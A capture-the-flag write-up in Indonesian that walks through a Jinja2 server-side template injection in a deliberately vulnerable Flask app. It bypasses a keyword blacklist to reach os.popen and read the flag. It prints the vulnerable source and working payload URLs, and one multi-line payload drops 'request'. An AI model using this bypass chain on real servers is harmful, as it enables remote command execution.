Bypass (Solved After Event)

It's obvious, but can you bypass it to win the reward?

http://103.163.139.198:8888

Author: BerlianGabriel

Kita diberikan sebuah URL webite dan file source code dari webappnya.

Berikut adalah kode utama dari website (app.py).

from flask import Flask, request, render_template, render_template_string
import re 

app = Flask(__name__)

# Filter returns True if there is some pesky intruder
def filter(data):
    blacklist_words = ['.', '[', ']', '{{', '}}', '"', 'os', 'modules', 'base', 'import', 'application', 'builtins', "*"]
    additional_check = ['_', '__']
    additional_check = re.compile('|'.join(map(re.escape, additional_check)))

    for word in blacklist_words:
        if word in data:
            return True 
    
    return additional_check.match(data)

@app.route("/")
def index():
    title = request.args.get('title', 'Your title', type=str)
    content = request.args.get('content', "Multiple lines of text that form the lede, informing new readers quickly and efficiently about what's interesting in the content", type=str)

    if filter(title) or filter(content):
        title = "Oops..."
        content = "Nice try, but you got blocked by our super secure filtering"

    try:
        title = render_template_string(title)
        content = render_template_string(content)
    except Exception:
        title = "Error"
        content = "Ouch! Some error has occured"

    return render_template("index.html", title=title, content=content)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=8888, debug=False) 

Pada website ini, kita bis meng-custom title dan content-nya menggunkan GET request. Misalnya, berikut adalah hasil render dari http://103.163.139.198:8888/?title=h4cked&content=payload .

Kerentanan web ini adalah pada kode template HTML-nya yang menonaktifkan fitur bawaan 'safe' dari Jinja2. Dengan begini, syntax dari Jinja dan HTML akan di-render benar-benar seadanya, sehingga kita bisa melakukan serangan SSTI (Server Side Template Injection).

      <main class="container">
        <div class="p-4 p-md-5 mb-4 rounded text-body-emphasis bg-body-secondary">
          <div class="col-lg-6 px-0">
            <h1 class="display-4 fst-italic">{{ title | safe }}</h1>
            <p class="lead my-3">{{ content | safe }}</p>
          </div>
        </div>
      </main>

Untungnya, web ini masih menyiapkan filter sehingga syntax yang berpotensi digunakan untuk menyerang web akan di-block. Walaupun begitu, dengan filter seperti ini pun, masih ada beberapa cara untuk membypass-nya.

def filter(data):
    blacklist_words = ['.', '[', ']', '{{', '}}', '"', 'os', 'modules', 'base', 'import', 'application', 'builtins', "*"]
    additional_check = ['_', '__']
    additional_check = re.compile('|'.join(map(re.escape, additional_check)))

    for word in blacklist_words:
        if word in data:
            return True 
    
    return additional_check.match(data)

Misalnya, untuk membypass string seperti os, kita bisa menggunakan payload ''.join(['o','s']) . Oh, karakter . juga di-block? Gampang, untuk mengakses atribut dari sebuah objek di Jinja, kita bisa gunakan Object | attr('nama_atribut'), sehingga payloadnya akan menjadi '' | attr('join')([ . Apa? [ dan ] juga di-block? Tenang, atribut join() tidak hanya menerima list, tapi juga tuple, sehingga payloadnya bisa dibuat menjadi '' | attr('join')(('o','s')) .

Intinya, untuk mengerjakan soal ini, kita perlu mencari cara-cara kreatif untuk mencapai tujuan yang sama dengan cara yang berbeda. Selama mengerjakan soal ini, saya merujuk pada artikel ini.

Dalam serangan SSTI, biasanya tujuan utama kita adalah untuk menjalankan atribut popen , karena dengan itu, kita bisa menjalankan sebagian besar system command yang kita butuhkan. Pada payload di bawah ini, saya mencoba menjalankan ls .

{% print(
    | attr('' | attr('join')(('appli','cation')))
    | attr('' | attr('join')(('\x5f\x5f','glo','bals','\x5f\x5f')))
    | attr('\x5f\x5fgetitem\x5f\x5f')('' | attr('join')(('\x5f\x5f','built','ins','\x5f\x5f')))
    | attr('\x5f\x5fgetitem\x5f\x5f')('' | attr('join')(('\x5f\x5f','im','port','\x5f\x5f')))('' | attr('join')(('o','s')))
    | attr('popen')('ls')
    | attr('read')()
    )
%}

# Copy-able: http://103.163.139.198:8888/?title=h4cked&content={%%20print(request%20|%20attr(%27%27%20|%20attr(%27join%27)((%27appli%27,%27cation%27)))%20|%20attr(%27%27%20|%20attr(%27join%27)((%27\x5f\x5f%27,%27glo%27,%27bals%27,%27\x5f\x5f%27)))%20|%20attr(%27\x5f\x5fgetitem\x5f\x5f%27)(%27%27%20|%20attr(%27join%27)((%27\x5f\x5f%27,%27built%27,%27ins%27,%27\x5f\x5f%27)))%20|%20attr(%27\x5f\x5fgetitem\x5f\x5f%27)(%27%27%20|%20attr(%27join%27)((%27\x5f\x5f%27,%27im%27,%27port%27,%27\x5f\x5f%27)))(%27%27%20|%20attr(%27join%27)((%27o%27,%27s%27)))%20|%20attr(%27popen%27)(%27ls%27)%20|%20attr(%27read%27)())%20%}

Nah, kalau sudah bekerja seperti ini, tinggal ganti saja commandnya menjadi cat reward/flag.txt tapi karena karakter . di-block, payloadnya perlu kita sesuaikan menjadi '' | attr('join')(('cat reward/flag','\x2e','txt')). Berikut adalah payload akhir yang akan memberikan kita flag-nya.

http://103.163.139.198:8888/?title=h4cked&content={%%20print(request%20|%20attr(%27%27%20|%20attr(%27join%27)((%27appli%27,%27cation%27)))%20|%20attr(%27%27%20|%20attr(%27join%27)((%27\x5f\x5f%27,%27glo%27,%27bals%27,%27\x5f\x5f%27)))%20|%20attr(%27\x5f\x5fgetitem\x5f\x5f%27)(%27%27%20|%20attr(%27join%27)((%27\x5f\x5f%27,%27built%27,%27ins%27,%27\x5f\x5f%27)))%20|%20attr(%27\x5f\x5fgetitem\x5f\x5f%27)(%27%27%20|%20attr(%27join%27)((%27\x5f\x5f%27,%27im%27,%27port%27,%27\x5f\x5f%27)))(%27%27%20|%20attr(%27join%27)((%27o%27,%27s%27)))%20|%20attr(%27popen%27)(%27%27%20|%20attr(%27join%27)((%27cat%20reward/flag%27,%27\x2e%27,%27txt%27)))%20|%20attr(%27read%27)())%20%}

Flag: IFEST13{SSTI_byp4ss_f1lt3rs_to_w1n_R3W4RD}

Footnote

Berikut write-up dari tim lainnya pada soal yang sama, yang menurut saya bagus untuk sumber belajar:

• https://hackmd.io/@BbayuGt/BkQ98gRxxl#Bypass